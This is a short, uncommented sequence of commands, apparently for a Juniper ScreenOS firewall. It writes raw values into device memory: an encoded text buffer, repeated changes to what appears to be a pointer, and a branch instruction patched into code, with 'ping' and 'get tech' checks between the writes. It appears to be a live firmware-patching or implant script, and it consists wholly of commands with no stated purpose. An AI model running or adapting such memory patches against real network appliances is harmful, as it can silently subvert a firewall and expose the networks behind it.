set mem addr 0x195c2c0 0x000636f0
ping
set mem addr 0x1a7cbd0 0x4d333241
set mem addr 0x1a7cbd4 0x3331432c
set mem addr 0x1a7cbd8 0x3031653a
set mem addr 0x1a7cbdc 0x33443230
set mem addr 0x1a7cbe0 0x30303334
set mem addr 0x1a7cbe4 0x33383630
set mem addr 0x1a7cbe8 0x34383030
set mem addr 0x1a7cbec 0x62303639
set mem addr 0x1a7cbf0 0x32633434
set mem addr 0x1a7cbf4 0x33643230
set mem addr 0x1a7cbf8 0x30303639
set mem addr 0x1a7cbfc 0x36313239
set mem addr 0x1a7cc00 0x62323730
set mem addr 0x1a7cc04 0x37643238
set mem addr 0x1a7cc08 0x30336136
set mem addr 0x1a7cc0c 0x34653830
set mem addr 0x1a7cc10 0x30303230
set mem addr 0x1a7cc14 0x00000000
set mem addr 0x195c2c0 0x0032a168
get tech | in juniper
ping
set mem addr 0x636d0 0x60630300
set mem addr 0x195c2c0 0x000636f0
get tech | in juniper
ping
set mem addr 0x342304 0x48000014
set mem addr 0x195c2c0 0x00644990
